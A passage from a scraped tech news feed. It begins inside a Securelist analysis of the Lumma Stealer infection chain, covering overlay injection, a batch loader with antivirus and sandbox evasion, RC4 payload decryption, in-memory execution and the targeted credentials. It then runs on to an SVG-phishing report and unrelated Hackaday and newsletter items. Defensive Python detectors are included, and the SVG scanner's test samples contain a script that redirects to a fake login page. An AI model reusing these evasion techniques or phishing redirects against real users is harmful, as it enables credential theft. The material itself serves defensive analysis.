    Another method commonly used by Lumma Stealer is to inject a malicious payload into the overlay section of free software. The overlay section is typically used for legitimate software functionality, such as displaying graphical interfaces or handling certain input events. By modifying this section of the software, the adversary can inject the malicious payload without disrupting the normal operation of the application. This method is particularly insidious because the software continues to appear legitimate while the malicious code silently executes in the background. It also helps the malware evade detection by security tools that focus on system-level monitoring.

Both of these methods rely on exploiting trusted applications, which significantly increases the chances of successful infection. These techniques can be used in combination with others, such as phishing or trojanized software bundles, to maximize the spread of Lumma Stealer to multiple targets.

Sample analysis


To demonstrate how the Lumma Stealer installers work and the impact on systems and data security, we’ll analyze the stealer sample we found in the incident at our customer. This sample utilizes the overlay injection technique. Below is a detailed breakdown of the infection chain and the various techniques used to deploy and execute Lumma Stealer.

Initial execution and self-extracting RAR (SFX)


The initial payload in this sample is delivered as ProjectorNebraska.exe: a corrupted copy of a legitimate program with the malware appended in its overlay. Once the victim runs it, the file extracts and runs a self-extracting RAR (SFX) archive, which carries the next stage of the infection, a Nullsoft Scriptable Install System (NSIS) installer. NSIS is a widely used open-source tool for building Windows installers.
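
To make the overlay concrete, here is a small parser, written for this article as an added example rather than code from the analysis above, that locates a PE file’s overlay by walking the section table and then looks for a RAR signature in it, the kind of check that would pick out a trojanized carrier like ProjectorNebraska.exe. The bytes of that sample are not on the page, so the block builds a minimal, non-executable stand-in PE itself; the layout constants are those of the PE format, the RAR magic is the shared prefix of the RAR4 and RAR5 signatures, and everything else (the section contents, the sample overlay text) is made up for the example.

```python
import struct

# Common prefix of the RAR4 ("Rar!\x1a\x07\x00") and RAR5 ("Rar!\x1a\x07\x01\x00") signatures.
RAR_MAGIC = b"Rar!\x1a\x07"

COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def pe_overlay(pe: bytes):
    """Return (offset, data) for the overlay of a PE image: everything past the end of
    the last section's raw data as declared in the section table. Raises ValueError
    when the headers are not those of a PE file."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    section_table = coff + COFF_HEADER_SIZE + size_of_optional
    # The headers themselves occupy at least up to the end of the section table.
    end_of_image = section_table + num_sections * SECTION_HEADER_SIZE
    for i in range(num_sections):
        off = section_table + i * SECTION_HEADER_SIZE
        _name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        if raw_size:                               # .bss-style sections have no raw data
            end_of_image = max(end_of_image, raw_ptr + raw_size)
    end_of_image = min(end_of_image, len(pe))      # truncated file: nothing past the cut
    return end_of_image, pe[end_of_image:]


def find_embedded_rar(overlay: bytes) -> int:
    """Offset of a RAR archive signature inside the overlay, or -1 if none."""
    return overlay.find(RAR_MAGIC)


def build_carrier(section_data: bytes, overlay: bytes) -> bytes:
    """Build a minimal, structurally valid (not executable) PE with one section and
    the given bytes appended as overlay. Constructed for this example only."""
    e_lfanew = 0x40
    coff = e_lfanew + 4
    section_table = coff + COFF_HEADER_SIZE        # SizeOfOptionalHeader = 0 for brevity
    raw_ptr = section_table + SECTION_HEADER_SIZE  # section data directly follows its header
    hdr = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr += b"PE\0\0"
    # Machine=i386, NumberOfSections=1, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0, Characteristics (EXECUTABLE_IMAGE | 32BIT)
    hdr += struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
    # NumberOfLinenumbers, Characteristics (CODE | EXECUTE | READ)
    hdr += struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                       len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    assert len(hdr) == raw_ptr
    return bytes(hdr) + section_data + overlay


# Constructed stand-in for ProjectorNebraska.exe: a 16-byte "code" section followed by an
# overlay that begins with a RAR signature (the real sample's bytes are not shown on the page).
SAMPLE_OVERLAY = RAR_MAGIC + b"\x00" + b"<sfx archive body>"
SAMPLE_EXE = build_carrier(b"\x90" * 16, SAMPLE_OVERLAY)


def demo():
    """(overlay offset, overlay length, offset of the RAR signature inside it)."""
    offset, overlay = pe_overlay(SAMPLE_EXE)
    return offset, len(overlay), find_embedded_rar(overlay)


if __name__ == "__main__":
    print(demo())   # (144, 25, 0)
```

One caveat for production use: an Authenticode-signed file stores its certificate table after the last section as well, so a real tool reads the security data directory from the optional header and excludes that range; this parser skips the optional header and would report the certificate table as overlay.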

NSIS installer components


The NSIS installer drops several components that are critical to the malware’s execution:

NSIS installer components

These include AutoIt components and an obfuscated batch script loader named Hose.cmd. The following AutoIt components are dropped:

  • Fragments of a legitimate AutoIt executable: These are pieces of a genuine AutoIt executable that are dropped to the victim’s system, and then reassembled during the infection process.
  • Compiled AutoIt script: The compiled script is the loader for the next stage. It runs the anti-analysis checks, then decrypts, decompresses and executes the embedded payload that does the actual credential theft and data exfiltration (see the AutoIt script analysis below).

These components are later reassembled into the final executable payload using the batch script loader that concatenates and executes the various fragments.

Hose.cmd orchestrates the final steps of the malware’s execution. Below is a breakdown of its key components (after deobfuscation):

Deobfuscated batch script code

Process tree after executing the batch script

The batch script performs the following actions:

  • Security product evasion
    • The script first looks for two security products, SecureAnywhere and Quick Heal AntiVirus, in the output of tasklist. If either is present, it stalls with ping -n 198, which sends 198 echo requests to localhost with a one-second pause between them, a delay of over three minutes. The aim is to outlast automated sandboxes, which typically stop analysis before the script gets past the ping.
    • It then checks tasklist for processes belonging to Avast, AVG, McAfee, Bitdefender or Sophos. If one of them is found, the AutoIt interpreter keeps its original name, AutoIt3.exe; otherwise it is renamed to Suggests.pif.


  • Environment setup and payload preparation. The script sets environment variables pointing at the AutoIt executable and the final payload, and creates a working directory named 195402 under the Temp directory to hold the malicious components.
  • Obfuscation and extraction. It strips the filler string OptimumSlipProfessionalsPerspective from a file named Sitting dropped by the NSIS installer and stores the result as Suggests.pif. It then uses copy /b to append another dropped component, Oclc, producing the reassembled AutoIt interpreter, again saved as Suggests.pif.
  • Payload assembly. It concatenates several more dropped files (Italy, Holmes, True and others) into h.a3x, the compiled AutoIt script that carries the loader logic.
  • Execution of Lumma Stealer. Finally, the script launches Suggests.pif with h.a3x as its script, so the rebuilt AutoIt interpreter runs the loader and the AutoIt stage of the Lumma Stealer infection begins.


AutoIt script analysis


During the analysis, the AutoIt Extractor utility was used to decompile and extract the script from the h.a3x file. The script was heavily obfuscated and required additional deobfuscation to get a clean and analyzable .au3 script. Below is the analysis of the AutoIt loader’s behavior.

AutoIt script extraction

Anti-analysis checks


The script begins by validating the environment to detect analysis tools or sandbox environments. It checks for specific computer names and usernames often associated with testing environments.

Environment validation

It then checks for processes from popular antivirus tools such as Avast (avastui.exe), Bitdefender (bdagent.exe), and Kaspersky (avp.exe).

Anti-AV checks

If any of these conditions are met, the script halts execution to evade detection.

Executing loader shellcode


If the anti-analysis checks pass, the script picks 32-bit or 64-bit shellcode, both stored in the $vinylcigaretteau variable, according to the system architecture. It allocates a block of executable memory, copies the shellcode into it and runs it. The shellcode sets up the execution environment and prepares for the second-stage payload.

Part of the AutoIt loader responsible for the shellcode execution

Processing the $dayjoy payload


After executing the loader shellcode, the script processes the second-stage payload located in the $dayjoy variable. The payload is decrypted using RC4 with a hardcoded key 1246403907690944.

The encrypted payload

To decrypt the payload independently, we wrote a custom Python script that you can see in the screenshot below.

Python script for payload decryption

The decrypted payload is decompressed using the LZNT1 algorithm.

Payload decompression

Final payload execution


After decryption and decompression, the $dayjoy payload is executed in memory: the script calls into the decoded buffer through DllCallAddress, directly at the allocated address. The payload is therefore never written to disk, which keeps it out of reach of file-based scanning.

Final payload execution

This final payload is the stealer itself. The malware’s comprehensive data theft capabilities target a wide range of sensitive information, including:

  • Cryptocurrency wallet credentials (e.g., Binance, Ethereum) and associated browser extensions (e.g., MetaMask)
  • Two-factor authentication (2FA) data and authenticator extensions
  • Browser-stored credentials and cookies
  • Stored credentials from remote access tools such as AnyDesk
  • Stored credentials from password managers such as KeePass
  • System and application data
  • Financial information such as credit card numbers


C2 communication


Once Lumma Stealer is executed, it establishes communication with its command and control (C2) servers to exfiltrate the stolen data. The malware sends the collected information back to the attacker’s infrastructure for further exploitation. This communication is typically performed over HTTP or HTTPS, often disguised as legitimate traffic to avoid detection by network security monitoring tools.

C2 servers identified


The following C2 domains used by Lumma Stealer to communicate with the attackers were identified in the analyzed sample:

These domains are used to receive stolen data from infected systems. Communication with these servers is typically via encrypted HTTP POST requests.

Conclusions


As a mass-distributed malicious program, Lumma Stealer employs a complex infection chain that includes a number of anti-analysis and detection evasion techniques, to stealthily infiltrate the victim’s device. Although the initial infection via dubious pirated software and cryptocurrency-related websites and Telegram channels suggests that individuals are the primary targets of these attacks, we saw Lumma in an incident at one of our customers, which illustrates that organizations can also fall victim to this threat. The information stolen by such malware may end up in the hands of more prominent cybercriminals, such as ransomware operators. That’s why it’s important to prevent stealer infections at the early stages. By understanding the infection techniques, security professionals can better defend against this growing threat and develop more effective detection and prevention strategies.

IoCs


The following list contains the URLs detected during our research. Note that the attackers change the malicious URLs and Telegram channels almost daily, and the IoCs provided in this section were already inactive at the time of writing. However, they may be useful for retrospective threat detection.

Malicious fake CAPTCHA pages



Telegram channels distributing Lumma



securelist.com/lumma-fake-capt…


A digital conscious uncoupling


ANOTHER MONDAY, ANOTHER DIGITAL POLITICS. I'm Mark Scott, and you find me enjoying the four-day Easter weekend here in the United Kingdom. In honor of that, I give you my new favorite podcast.

In my day job, I'll be interviewing Brad Smith, Microsoft's president, in Brussels on April 30 at 10am CET. You can watch along here. For those of you who would like to attend in person, drop me a line here.

— Policymakers worldwide are now seriously considering a future where digital policymaking excludes the United States. Let's unpick what that means.

— It's official: Google is most definitely a monopoly, on both sides of the Atlantic. That will have far-reaching consequences — but it will take time.

— Digital rights civil society groups have been severely impacted by cuts in US government support. Here are the charts that explain the impact.

Let's get started:



digitalpolitics.co/newsletter0…


Biasing Transistors with Current Sources


A photo of Aaron Danner with a current mirror schematic in an overlay.

Over on his YouTube channel [Aaron Danner] explains biasing transistors with current sources in the 29th video of his Transistors Series. In this video, he shows how to replace a bias resistor (and consequently an additional capacitor) with a current source for both common-emitter and common-collector amplifiers.

A current source delivers a constant current regardless of the load: if the load resistance changes, the source adjusts its voltage to compensate. For biasing, this is exactly what you want. The usual resistor biasing arrangement only approximates this over a narrow voltage range, which is generally good enough, but not as good as a true current source.

As [Aaron] explains there are various advantages to biasing transistors with current sources instead of resistors, chief among them is that it allows you to get rid of a capacitor (capacitors are expensive to make in integrated circuits and often among the lowest-quality components in a design). You can also avoid losing some of your gain through the bias resistor.

The current source that [Aaron] uses in this video is known as a current mirror.

youtube.com/embed/kpd0uMzng8o?…


hackaday.com/2025/04/21/biasin…


Phishing attacks leveraging HTML code inside SVG files


With each passing year, phishing attacks feature more and more elaborate techniques designed to trick users and evade security measures. Attackers employ deceptive URL redirection tactics, such as appending malicious website addresses to seemingly safe links, embed links in PDFs, and send HTML attachments that either host the entire phishing site or use JavaScript to launch it. Lately, we have noticed a new trend where attackers are distributing attachments in SVG format, the kind normally used for storing images.

SVG format


SVG (Scalable Vector Graphics) is a format for describing two-dimensional vector graphics using XML. This is how an SVG file appears when opened in image viewing software.

SVG image
SVG image

But if you open it in a text editor, you can see the XML markup that describes the image. This markup allows for easy editing of image parameters, eliminating the need for resource-intensive graphics editors.

This is what an SVG file looks like when opened in a text editor
This is what an SVG file looks like when opened in a text editor

Because SVG is XML, an SVG document can carry more than drawing instructions: it may contain <script> elements, and a <foreignObject> element can wrap arbitrary HTML, neither of which is possible in a raster format such as JPEG or PNG. Designers use this to embed text, formulas and interactive elements. Attackers exploit the same feature by embedding links or scripts that lead to phishing pages inside what looks like an image file. A caveat worth knowing: browsers do not execute scripts in an SVG referenced from an <img> tag, but they do when the file is opened directly, for example by double-clicking an attachment, which is exactly what a phishing email asks the recipient to do.

Sample SVG file with embedded HTML code. The <foreignObject> tag introduces HTML markup

Phishing email campaigns leveraging SVG files


At the start of 2025, we observed phishing emails that resembled attacks with an HTML attachment, but instead utilized SVG files.

Phishing email with an SVG attachment

A review of the email’s source code shows that the attachment is identified as an image type.

The file as displayed in the email body

However, opening the file in a text editor reveals that it is essentially an HTML page with no mention of vector graphics.

Code of the SVG file

In a browser, this file appears as an HTML page with a link that supposedly points to an audio file.

SVG file viewed as HTML

Clicking the link redirects the user to a phishing page masquerading as Google Voice.

Phishing page mimicking Google Voice

The audio track at the top of the page is a static image. Clicking “Play Audio” redirects the user to a corporate email login page, allowing attackers to capture their credentials. This page, too, mentions Google Voice. The page also includes the target company’s logo, aiming to lower the user’s guard.

Login form

In a separate instance, mimicking a notification from an e-signature service, attackers presented an SVG attachment as a document that required review and signature.

Phishing e-signature request

Unlike the first example, where the SVG file acted as an HTML page, in this case it contains JavaScript that, when the file is opened, launches a browser window with a phishing site featuring a fake Microsoft login form.

Code of the SVG file

Phishing login form
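
Both variants described above, the SVG that is really an HTML page (first case) and the SVG whose script opens a browser window (second case), can be caught with a structural check rather than a signature. The scanner below is an added example for this article, not Kaspersky’s detection logic: it parses the attachment as XML with the standard library and reports <script> elements, <foreignObject> blocks, HTML elements, event-handler attributes and href values that point to external sites or use an active scheme. The three sample files and the example.invalid hostnames are constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

XHTML_NS = "http://www.w3.org/1999/xhtml"
EVENT_HANDLER = re.compile(r"^on[a-z]+$", re.I)             # onload, onclick, ...
ACTIVE_SCHEME = re.compile(r"^\s*(javascript|vbscript|data):", re.I)


def _split(qname: str):
    """'{ns}local' -> (ns, local); unqualified names get an empty namespace."""
    if qname.startswith("{"):
        ns, local = qname[1:].split("}", 1)
        return ns, local
    return "", qname


def scan_svg(data: bytes) -> List[str]:
    """Return human-readable findings for one SVG attachment. An empty list means
    nothing but drawing content was found. The stdlib expat parser does not fetch
    external entities, so untrusted input cannot trigger network access here."""
    findings: List[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _split(root.tag)[1] != "svg":
        findings.append(f"root element is <{_split(root.tag)[1]}>, not <svg>")
    html_elements = set()
    for elem in root.iter():
        ns, name = _split(elem.tag)
        if name == "script":
            findings.append("embedded <script> element")
        elif name == "foreignObject":
            findings.append("<foreignObject> element (hands its content to the HTML renderer)")
        elif ns == XHTML_NS:
            html_elements.add(name)
        for attr, value in elem.attrib.items():
            aname = _split(attr)[1]
            if EVENT_HANDLER.match(aname):
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href":                           # covers href and xlink:href
                if ACTIVE_SCHEME.match(value):
                    findings.append(f"href on <{name}> uses an active scheme: {value[:60]}")
                elif value.lower().startswith(("http://", "https://")):
                    findings.append(f"external link on <{name}>: {value}")
    if html_elements:
        findings.append("HTML elements inside the image: " + ", ".join(sorted(html_elements)))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_svg(data))


# Constructed samples (hostnames use the reserved .invalid TLD; they are not real IoCs).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="orange"/>
</svg>"""

# First case on the page: the "image" is an HTML page with a link to the phishing site.
HTML_IN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
  <foreignObject width="600" height="400">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <p>You have a new voice message</p>
      <a href="https://voice.example.invalid/play">Play Audio</a>
    </div>
  </foreignObject>
</svg>"""

# Second case: a script that opens the phishing page as soon as the file is rendered.
SCRIPT_IN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">window.open("https://login.example.invalid/");</script>
  <rect width="1" height="1" onload="window.location='https://login.example.invalid/'"/>
</svg>"""


def demo():
    return {name: scan_svg(blob) for name, blob in
            (("benign", BENIGN_SVG), ("html", HTML_IN_SVG), ("script", SCRIPT_IN_SVG))}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "clean")
```

The empty finding list for the plain drawing is the point: a gateway can let real images through while quarantining anything with script or HTML content. Two caveats: a real mail filter should also compare the declared Content-Type (the page notes the attachment is labelled as an image) against what the parser finds, and obfuscated payloads (scripts assembled from entities or split strings) are exactly why the check is structural rather than a keyword match on the raw text.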

Statistics


Our telemetry data indicates a significant increase in SVG campaigns during March 2025. We found 2,825 of these emails in just the first quarter of the year.

Emails with SVG attachments, January through March 2025

In April, the upward trend continued: in the first half of the month, we detected 1,324 emails with SVG attachments, more than two-thirds of March’s figure.

Takeaways


Phishers are relentlessly exploring new techniques to circumvent detection. They vary their tactics, sometimes employing user redirection and text obfuscation, and other times, experimenting with different attachment formats. The SVG format provides the capability to embed HTML and JavaScript code within images, which is misused by attackers. Despite not being widespread at the time of this study, SVG attachment attacks are showing a clear upward trend. These attacks, while currently relatively basic – much like HTML attachment scenarios – involve SVG files containing either a phishing link page or a redirection script to a fraudulent site. However, the use of SVG as a container for malicious content can also be employed in more sophisticated targeted attacks.


securelist.com/svg-phishing/11…


Printed Perpetual Calendar Clock Contains Clever Cams


At Hackaday, it is always clock time, and clock time is a great time to check in with [shiura], whose 3D Printed Perpetual Calendar Clock is now at Version 2. A 3D printed calendar clock, well, no big deal, right? Grab a few steppers, slap in an ESP32 to connect to a time server, and you’re good. That’s where most of us would probably go, but most of us aren’t [shiura], who has some real mechanical chops.
The front face of the perpetual calendar clock. There’s also a 24-hour dial, because why not?
This clock isn’t all mechanical. It probably could be, but at its core it uses a commercial quartz movement — you know, the cheap ones that take a single double-A battery. The only restriction is that the length of the hour axis must be twelve millimeters or more. Aside from that, a few self-tapping screws and an M8 nut, everything else is fully 3D printed.

From that simple quartz movement, [shiura]’s clock tracks not only the day of the week, the month and date — even in February, and even compensating for leap years. Except for the inevitable drift (and battery changes) you should not have to adjust this clock until March 2100, assuming both you and the 3D printed mechanism live that long. Version one actually did all this, too, but somehow we missed it; version two has some improvements to aesthetics and usability. Take a tour of the mechanism in the video after the break.

We’ve featured several of [shiura]’s innovative clocks before, from a hybrid mechanical-analog display, to a splitless flip-clock, and a fully analog hollow face clock. Of course [shiura] is hardly our only clock-making contributor, because it is always clock time at Hackaday.

youtube.com/embed/H03xxuqXKgE?…


hackaday.com/2025/04/21/printe…


Preventing Galvanic Corrosion in Water Cooling Loops


Water is an excellent coolant, but the flip side is that it is also an excellent solvent. This, in short, is why any water cooling loop is also a prime candidate for an interesting introduction to the galvanic metal series, resulting in severe corrosion that commences immediately. In a recent video by [der8auer], this issue is demonstrated using a GPU cold plate. The part is made out of nickel-plated copper and features many small channels to increase surface area with the coolant.
The surface analysis of the sample cold plate after a brief exposure to distilled water shows the deposited copper atoms. (Credit: der8auer, YouTube)
Theoretically, if one were to use distilled water in a coolant loop that contains a single type of metal (like copper), there would be no issue. As [der8auer] points out, fittings, radiators, and the cooling block are nearly always made of various metals and alloys like brass, for example. This thus creates the setup for galvanic corrosion, whereby one metal acts as the anode and the other as a cathode. While this is desirable in batteries, for a cooling loop, this means that the water strips metal ions off the anode and deposits them on the cathode metal.

The nickel-plated cold plate should be immune to this if the plating were perfect. However, as demonstrated in the video, even a brief exposure to distilled water at 60°C induced strong galvanic corrosion. Analysis in an SEM showed that the imperfect nickel plating allowed copper ions to be dissolved into the water before being deposited on top of the nickel (cathode). In a comparison with another sample that had a coolant with corrosion inhibitor (DP Ultra) used, no such corrosion was observed, even after much longer exposure.

This DP Ultra coolant is mostly distilled water but has glycol added. The glycol improves the pH and coats surfaces to prevent galvanic corrosion. The other element is benzotriazole, which provides similar benefits. Of course, each corrosion inhibitor targets a specific environment, and there is also the issue with organic films forming, which may require biocides to be added. As usual, water cooling has more subtlety than you’d expect.

youtube.com/embed/7pIpKetQlZs?…


hackaday.com/2025/04/20/preven…


China Hosts Robot Marathon


China played host to what, presumably, was the world’s first robot and human half-marathon. You can check out the action and the Tiangong Ultra robot that won in the video below. The event took place in Beijing and spanned 21.1 km. There was, however, a barrier between lanes for humans and machines.

The human rules were the same as you’d expect, but the robots did need a few concessions, such as battery swap stops. The winning ‘bot crossed the finish line in just over 160 minutes. However, there were awards for endurance, gait design, and design innovation.

Humans still took the top spots, though. We also noted that some of the robots had issues where they lost control or had other problems. Even the winner fell down once and had three battery changes over the course.

Of the 21 robots that started, only six made the finish line. We don’t know how many of the 12,000 humans finished, but we are pretty sure it was more than six, so we don’t think runners have to worry about robot overlords yet. But they’re getting better all the time.

youtube.com/embed/BYmCxYTbg50?…


hackaday.com/2025/04/20/china-…


Hackaday Links: April 20, 2025


Hackaday Links Column Banner

We appear to be edging ever closer to a solid statement of “We are not alone” in the universe with this week’s announcement of the detection of biosignatures in the atmosphere of exoplanet K2-18b. The planet, which is 124 light-years away, has been the focus of much attention since it was discovered in 2015 using the Kepler space telescope because it lies in the habitable zone around its red-dwarf star. Initial observations with Hubble indicated the presence of water vapor, and follow-up investigations using the James Webb Space Telescope detected all sorts of goodies in the atmosphere, including carbon dioxide and methane. But more recently, JWST saw signs of dimethyl sulfide (DMS) and dimethyl disulfide (DMDS), organic molecules which, on Earth, are strongly associated with biological processes in marine bacteria and phytoplankton.

The team analyzing the JWST data says that the data is currently pretty good, with a statistical significance of 99.7%. That’s a three-sigma result, and while it’s promising, it’s not quite good enough to seal the deal that life evolved more than once in the universe. If further JWST observations manage to firm that up to five sigma, it’ll be the most important scientific result of all time. To our way of thinking, it would be much more significant than finding evidence of ancient or even current life in our solar system, since cross-contamination is so easy in the relatively cozy confines of the Sun’s gravity well. K2-18b is far enough away from our system as to make that virtually impossible, and that would say a lot about the universality of biochemical evolution. It could also provide an answer to the Fermi Paradox, since it could indicate that the galaxy is actually teeming with life but under conditions that make it difficult to evolve into species capable of making detectable techno-signatures. It’s hard to build a radio or a rocket when you live on a high-g water world, after all.

Closer to home, there’s speculation that the famous Antikythera mechanism may not have worked at all in its heyday. According to researchers from Universidad Nacional de Mar del Plata in Argentina, “the world’s first analog computer” could not have worked due to the accumulated mechanical error of its gears. They blame this on the shape of the gear teeth, which appear triangular on CT scans of the mechanism, and which they seem to attribute to manufacturing defects. Given the 20-odd centuries the bronze device spent at the bottom of the Aegean Sea and the potential for artifacts in CT scans, we’re not sure it’s safe to pin the suboptimal shape of the gear teeth on the maker of the mechanism. They also seem to call into question the ability of 1st-century BCE craftsmen to construct a mechanism with sufficient precision to serve as a useful astronomical calculator, a position that Chris from Clickspring has been putting the lie to with his ongoing effort to reproduce the Antikythera mechanism using ancient tools and materials. We’re keen to hear what he has to say about this issue.

Speaking of questionable scientific papers, have you heard about “vegetative electron microscopy”? It’s all the rage, having been mentioned in at least 22 scientific papers recently, even though no such technique exists. Or rather, it didn’t exist until around 2017, when it popped up in a couple of Iranian scientific papers. How it came into being is a bit of a mystery, but it may have started with faulty scans of a paper from the 1950s, which had the terms “vegetative” and “electron microscopy” printed in different columns but directly across from each other. That somehow led to the terms getting glued together, possibly in one of those Iranian papers because the Farsi spelling of “vegetative” is very similar to “scanning,” a much more sensible prefix to “electron microscopy.” Once the nonsense term was created, it propagated into subsequent papers of dubious scientific provenance by authors who didn’t bother to check their references, or perhaps never existed in the first place. The wonders of our AI world never cease to amaze.

And finally, from the heart of Silicon Valley comes a tale of cyber hijinks as several crosswalks were hacked to taunt everyone’s favorite billionaires. Twelve Palo Alto crosswalks were targeted by persons unknown, who somehow managed to gain access to the voice announcement system in the crosswalks and replaced the normally helpful voice messages with deep-fake audio of Elon Musk and Mark Zuckerberg saying ridiculous but plausible things. Redwood City and Menlo Park crosswalks may have also been attacked, and soulless city officials responded by disabling the voice feature. We get why they had to do it, but as cyberattacks go, this one seems pretty harmless.

youtube.com/embed/Uy1oNvsUQ0o?…


hackaday.com/2025/04/20/hackad…


milliForth-6502, a Forth for the 6502 CPU


Forth is popular on small computers because it is simple to implement, yet quite powerful. But what happens when you really need to shrink it? Well, if your target is the 6502, there’s milliForth-6502.

This is a port of milliForth, which is a fork of sectorforth. The sectorforth project set the standard, implementing a Forth so small it could fit in a 512-byte boot sector. The milliForth project took sectorforth and made it even smaller, weighing in at only 336 bytes. However, both milliForth and sectorforth are for the x86 architecture. With milliForth-6502, [Alvaro G. S. Barcellos] wanted to see how small he could make a 6502 implementation.

So how big is the milliForth-6502 binary? Our tests indicate: 1,110 bytes. It won’t quite fit in a boot sector, but it’s pretty small!

Most of the code for milliForth-6502 is assembly code in sector-6502.s. This code is compiled using tools from the cc65 project. To run the code lib6502 is used for 6502 emulation.

Emulation is all well and good as far as it goes, especially for development and testing, but we’d love to see this code running on a real 6502. Even better would be a 6502 built from scratch! If you get this code running we’d love to hear how it went!

youtube.com/embed/6P4tEYLEhU8?…


hackaday.com/2025/04/20/millif…


The Most Printable 3D Printer Yet


A 3D printer frame made of red plastic is shown on the left-hand side of the image. On the right-hand side, there is a large motor with a plastic frame attached to the frame. Next to the 3D printer, a blue plastic mesh is being fed through a red plastic frame.

Despite the best efforts of the RepRap community over the last twenty years, self-replicating 3D printers have remained a stubbornly elusive goal, largely due to the difficulty of printing electronics. [Brian Minnick]’s fully-printed 3D printer could eventually change that, and he’s already solved an impressive number of technical challenges in the process.

[Brian]’s first step was to make a 3D-printable motor. Instead of the more conventional stepper motors, he designed a fully 3D-printed 3-pole brushed motor. The motor coils are made from solder paste, which the printer applies using a custom syringe-based extruder. The paste is then sintered at a moderate temperature, resulting in traces with a resistivity as low as 0.001 Ω mm, low enough to make effective magnetic coils.

Brushed motors are less accurate than stepper motors, but they do have a particularly useful advantage here: their speed can be controlled simply by varying the voltage. This enables a purely electromechanical control system – no microcontroller on this printer! A 3D-printed data strip encodes instructions for the printer as holes in a plastic sheet, which open and close simple switches in the motor controller. These switches control the speed, direction, and duration of the motors’ movement, letting the data strip encode motion vectors.

Remarkably, the hotend on this printer is also 3D-printed. [Brian] took advantage of the fact that PEEK’s melting point increases by about 110 ℃ when it’s annealed, which should allow an annealed hotend to print itself. So far it’s only extruded PLA, but the idea seems sound.

The video below the break shows a single-axis proof of concept in action. We haven’t been able to find any documentation of a fully-functional 3D printer, but nevertheless, it’s an impressive demonstration. We’ve covered similar printers before, and if you make progress in this area, be sure to send us a tip.

youtube.com/embed/xiygZo0YxBw?…


hackaday.com/2025/04/20/the-mo…


Low Cost Oscilloscope Gets Low Cost Upgrades


Entry-level oscilloscopes are a great way to get some low-cost instrumentation on a test bench, whether it’s for a garage lab or a schoolroom. But the cheapest ones are often cheap for a reason, and even though they work well for the price they won’t stand up to more advanced equipment. But missing features don’t have to stay missing forever, as it’s possible to augment them to get some of these features. [Tommy]’s project shows you one way to make a silk purse from a sow’s ear, at least as it relates to oscilloscopes.

Most of the problem with these lower-cost tools is their low precision due to fewer bits of analog-digital conversion. They also tend to be quite noisy, further lowering the quality of the oscilloscope. [Tommy] is focusing his efforts on the DSO138-mini, an oscilloscope with a bandwidth of 100 kHz and an effective resolution of 10 bits. The first step is to add an anti-aliasing filter to the input, which is essentially a low-pass filter that removes high frequency components of the signal, which could cause a problem due to the lower resolution of the device. After that, digital post-processing is done on the output, which removes noise caused by the system’s power supply, among other things, and essentially acts as a second low-pass filter.

In part 2 of the project, [Tommy] demonstrates the effectiveness of these two methods with experimental data, showing that a good percentage of the noise on a test signal has been removed from the output. All the more impressive here is that the only additional cost besides the inexpensive oscilloscope itself is for a ceramic capacitor that costs around a dollar. We were also impressed: [Tommy] is a junior in high school!

Presumably, you could apply these techniques to other inexpensive equipment, like this even cheaper oscilloscope based on the ESP32.


hackaday.com/2025/04/20/low-co…


Building a Custom Zynq-7000 SoC Development Board from the Ground Up


Zynq-7000 banner.

In this series of 23 YouTube videos [Rich] puts the AMD Zynq-7000 SoC through its paces by building a development board from the ground up to host it along with its peripherals. The Zynq is part FPGA and part CPU, and while it has been around for a while, we don’t see nearly as many projects about it as we’d like.

Rich covers everything from the power system to HDMI, USB, DDR RAM, and everything in between. By the end, he’s able to boot PetaLinux.

The Zynq SoC includes an ARM Cortex-A9-based APU and an Artix-7 FPGA (or a Kintex-7 FPGA on higher models). In case you missed it, Xilinx was recently acquired by AMD, which is why you might have remembered this as a Xilinx part.

We’ve heard from [Rich] before. Back in 2021 we saw his Arduino Brings USB Mouse To Homebrew Computer. Don’t miss his follow-up playlist: Building on my Zynq-7000 in which he takes his Zynq-7000 board even further.

If you’re interested in FPGA technology but need something more easy going to get you started, be sure to check out how to build a 6809 CPU on an FPGA. Or, if you need something even simpler, report for boot camp.

youtube.com/embed/jbG5KUbGaGE?…

Thanks to [Alex] for the tip!


hackaday.com/2025/04/20/buildi…


Non-planar Slicing is for the Birds


Benchy, printed upside down on [Josh's] Core R-Theta printer.

When we say non-planar slicing is for the birds, we mean [Joshua Bird], who demonstrates the versatility of his new non-planar S4-Slicer by printing a Benchy upside down with the “Core R-Theta” printer we have featured here before.
Figure: a Benchy model, upside down, with the path from the end of the prow to the print bed highlighted. S4 slicer uses the path from any point (here, Benchy’s prow) as its basis…
This non-planar slicer is built into a Jupyter notebook, which follows a relatively simple algorithm to automatically generate non-planar toolpaths for any model. It does this by first generating a tetrahedral mesh of the model and then calculating the shortest possible path through the model from any given tetrahedron to the print bed. Even with non-planar printing, you need to print from the print-bed up (or out).

